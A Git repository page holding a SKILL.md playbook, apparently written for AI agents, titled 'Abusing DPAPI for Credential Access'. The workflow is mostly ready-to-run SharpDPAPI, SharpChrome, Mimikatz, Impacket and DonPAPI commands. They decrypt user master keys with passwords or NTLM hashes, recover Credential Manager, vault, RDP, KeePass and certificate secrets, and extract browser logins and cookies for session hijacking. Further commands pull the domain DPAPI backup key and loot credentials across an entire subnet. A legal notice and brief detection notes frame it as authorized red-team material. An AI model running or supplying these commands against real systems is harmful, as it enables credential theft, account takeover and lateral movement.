creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-26 11:44:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
768ca51c8d331ab0bdcea8ffb31c9b99bb2c1839
Anthropic-Cybersecurity-Skills/skills/abusing-dpapi-for-credential-access/SKILL.md
T
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817) 
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00

10 KiB
Raw Blame History

name, description, domain, subdomain, tags, version, author, license, nist_csf, mitre_attack
name description domain subdomain tags version author license nist_csf mitre_attack
abusing-dpapi-for-credential-access Extract DPAPI-protected secrets such as credentials and browser data offline and online. cybersecurity red-teaming
red-team
credential-access
dpapi
sharpdpapi
post-exploitation
active-directory
windows
mimikatz
1.0 mahipal Apache-2.0
DE.CM-01
T1555.004

Abusing DPAPI for Credential Access

Legal Notice: This skill is for authorized penetration testing, red-team engagements, and educational purposes only. Extracting credentials from systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud and abuse laws. Always operate within a signed rules-of-engagement and document every action.

Overview

The Windows Data Protection API (DPAPI) is the operating system's built-in symmetric-encryption service that applications use to protect secrets at rest: saved RDP and Windows Credential Manager credentials, web and Wi-Fi credentials in the Credential Vault, browser saved logins and cookies (Chrome/Edge), KeePass keys, certificate private keys, and Scheduled Task passwords. DPAPI derives a per-user (or per-machine) master key from the user's password (or the machine account secret), and that master key encrypts individual "DPAPI blobs." The encrypted master keys live under %APPDATA%\Microsoft\Protect\<SID>\ (user) and %WINDIR%\System32\Microsoft\Protect\ (machine).

Red teamers abuse DPAPI to recover plaintext secrets after gaining a foothold, mapping to MITRE ATT&CK T1555.004 (Credentials from Password Stores: Windows Credential Manager). There are three primary decryption paths:

  1. Online / context-based — running as the target user, DPAPI APIs (CryptUnprotectData) transparently decrypt the user's blobs. SharpDPAPI's /unprotect flag uses this.
  2. Offline with the user password or NTLM hash — decrypt the user's master keys with /password: or /ntlm:, then decrypt the blobs offline (great for triaged files pulled from a host).
  3. Domain-wide with the DPAPI backup key — Domain Admins can extract the domain's RSA DPAPI backup key (.pvk) once, then decrypt any domain user's master keys forever, online or offline, with /pvk:.

The canonical tooling is SharpDPAPI (GhostPack, a C# port of Mimikatz DPAPI functionality) for Windows, SharpChrome for browser secrets, and Mimikatz (dpapi::*) as the original implementation. On Linux, Impacket's dpapi.py and donpapi perform remote/offline triage.

When to Use

  • After compromising a Windows host where the user has saved RDP, browser, or vault credentials worth harvesting for lateral movement.
  • When you hold a user's password or NTLM hash and want to decrypt their DPAPI-protected secrets offline.
  • When you have Domain Admin and want to obtain the domain DPAPI backup key to decrypt any user's protected data across the estate.
  • When triaging exfiltrated Credentials, Vault, or Protect directories from disk images.
  • During purple-team exercises to validate detection of DPAPI master-key access and LSASS/Protect-folder reads.

Prerequisites

  • An authorized foothold (interactive session, beacon, or remote admin) on the target Windows host.
  • Knowledge of the target user's SID, and one of: the user's session, password, NTLM hash, or Domain Admin rights for the backup key.
  • Tooling (compile from source or use release binaries; obtain only from official upstreams):
# SharpDPAPI / SharpChrome (GhostPack) — build with Visual Studio / msbuild
git clone https://github.com/GhostPack/SharpDPAPI.git
# Open SharpDPAPI.sln and build Release, or:
msbuild SharpDPAPI.sln /p:Configuration=Release

# Mimikatz (original DPAPI implementation)
# https://github.com/gentilkiwi/mimikatz/releases

# Linux remote/offline triage (Impacket)
pipx install impacket            # provides dpapi.py / impacket-dpapi
pipx install donpapi             # https://github.com/login-securite/DonPAPI

Objectives

  • Triage a host for DPAPI-protected credential, vault, RDP, and certificate blobs.
  • Decrypt user master keys online (/unprotect), with a password/hash, or with the domain backup key.
  • Recover plaintext Credential Manager and Vault secrets.
  • Extract browser saved logins and cookies with SharpChrome.
  • Obtain and reuse the domain DPAPI backup key for estate-wide decryption.

MITRE ATT&CK Mapping

Technique ID Name Tactic Relevance
T1555.004 Credentials from Password Stores: Windows Credential Manager Credential Access DPAPI protects Credential Manager / Vault entries; decrypting master keys and blobs recovers these stored credentials.
T1555.003 Credentials from Password Stores: Credentials from Web Browsers Credential Access SharpChrome decrypts DPAPI-protected Chrome/Edge logins, cookies, and state keys.
T1003 OS Credential Dumping Credential Access Extracting master keys / backup keys is a form of credential material dumping.

Workflow

1. Triage the host for DPAPI blobs

Run the SharpDPAPI triage command in the user's context to automatically enumerate and (where possible) decrypt credentials, vaults, RDG/RDP, and certificates:

# Online triage in the current user's context (uses CryptUnprotectData)
SharpDPAPI.exe triage /unprotect

# Machine triage (requires local admin / SYSTEM) for machine-scoped blobs
SharpDPAPI.exe machinetriage

2. Decrypt user master keys offline (password or NTLM hash)

If you hold the user's password or hash, decrypt their master keys to a {GUID}:SHA1 mapping you can reuse against individual blobs:

# Decrypt all of the current/specified user's master keys with the password
SharpDPAPI.exe masterkeys /password:CorrectHorseBatteryStaple

# Decrypt master keys with the user's NTLM hash instead of the password
SharpDPAPI.exe masterkeys /ntlm:cc36cf7a8514893efccd332446158b1a

# Output is GUID:SHA1 lines — feed them to credentials/vaults commands

3. Recover Credential Manager and Vault secrets

Use the decrypted master-key mapping (or /pvk:) to decrypt the stored credentials and vault entries:

# Decrypt Credential Manager blobs with a GUID:SHA1 mapping
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1

# Or point at a target Credentials folder and decrypt with the domain backup key
SharpDPAPI.exe credentials /target:C:\Users\bob\AppData\Local\Microsoft\Credentials\ /pvk:backupkey.pvk

# Decrypt Credential Vault entries
SharpDPAPI.exe vaults /pvk:backupkey.pvk

4. Decrypt RDP, KeePass, and certificate secrets

# Saved RDCMan.settings RDP passwords (current user context)
SharpDPAPI.exe rdg /unprotect

# KeePass DPAPI-protected master keys
SharpDPAPI.exe keepass /unprotect

# Certificate private keys (export usable .pem with /showall for all stores)
SharpDPAPI.exe certificates /unprotect /showall

5. Extract browser credentials with SharpChrome

SharpChrome decrypts Chrome/Edge logins and cookies. Modern Chromium uses an App-Bound "state key" that SharpChrome resolves via DPAPI:

# Decrypt saved logins for the current user
SharpChrome.exe logins /unprotect

# Decrypt cookies (useful for session hijacking) in a target folder
SharpChrome.exe cookies /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /pvk:backupkey.pvk

# Resolve the AES state key explicitly
SharpChrome.exe statekeys /unprotect

6. Obtain the domain DPAPI backup key (Domain Admin)

With Domain Admin, retrieve the domain's RSA DPAPI backup private key once. This key decrypts every domain user's master keys indefinitely:

# Pull and save the domain backup key as a .pvk via the MS-BKRP RPC interface
SharpDPAPI.exe backupkey /server:dc01.corp.local /file:backupkey.pvk

Then decrypt any user's master keys offline with it:

SharpDPAPI.exe masterkeys /pvk:backupkey.pvk /target:C:\Users\alice\AppData\Roaming\Microsoft\Protect\

7. Remote / Linux-based triage (Impacket / DonPAPI)

From a Linux operator box, harvest and decrypt DPAPI secrets across hosts:

# Decrypt a single masterkey file with Impacket using the domain backup key
impacket-dpapi masterkey -file <masterkey_file> -pvk backupkey.pvk

# Decrypt a credential blob with the recovered masterkey
impacket-dpapi credential -file <cred_blob> -key 0x<decrypted_masterkey>

# Mass remote DPAPI looting across hosts with DonPAPI
donpapi collect -u alice -p 'Password123!' -d corp.local --target 10.0.0.0/24

Tools and Resources

Tool Purpose Link
SharpDPAPI Windows DPAPI triage/decryption (C#) https://github.com/GhostPack/SharpDPAPI
SharpChrome Chromium logins/cookies/state-key decryption https://github.com/GhostPack/SharpDPAPI
Mimikatz Original DPAPI (dpapi::*) implementation https://github.com/gentilkiwi/mimikatz
Impacket dpapi.py Remote/offline DPAPI decryption (Python) https://github.com/fortra/impacket
DonPAPI Mass remote DPAPI looting https://github.com/login-securite/DonPAPI
HackTricks DPAPI Technique reference https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html

Detection and OPSEC Notes

  • Master-key access and reads of \Microsoft\Protect\ and \Microsoft\Credentials\ are detectable; backupkey triggers an MS-BKRP RPC call to the DC.
  • The /unprotect (online) path is the stealthiest single-host option but only works as the live user.
  • Defenders should monitor for Sysmon process access to LSASS and abnormal access to Protect/Credentials folders (DE.CM-01).

Validation Criteria

  • Host triaged with SharpDPAPI triage / machinetriage.
  • User master keys decrypted via /unprotect, /password:, /ntlm:, or /pvk:.
  • Credential Manager and Vault secrets recovered.
  • RDP / KeePass / certificate secrets extracted where present.
  • Browser logins/cookies decrypted with SharpChrome.
  • Domain DPAPI backup key retrieved with Domain Admin (if in scope) and reused offline.
  • All recovered secrets documented with source host/user and ROE adherence confirmed.
Reference in New Issue View Git Blame Copy Permalink